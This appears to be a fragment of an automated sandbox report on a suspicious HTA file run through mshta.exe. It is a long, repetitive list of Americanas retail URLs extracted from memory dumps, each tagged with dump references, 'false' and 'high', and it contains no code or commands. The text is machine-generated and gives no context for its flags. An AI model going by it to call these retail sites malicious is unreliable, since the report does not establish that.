00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17Vmshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-homemshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401910650.00000000069F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401959077.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555amshta.exe, 00000001.00000003.12556397852.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542189598.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.americanas.com.br/categoria/gift-cardmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&chmshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-ledmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.americanas.com.br/categoria/tvmshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png.pngmshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hmmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condicimshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esportemshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
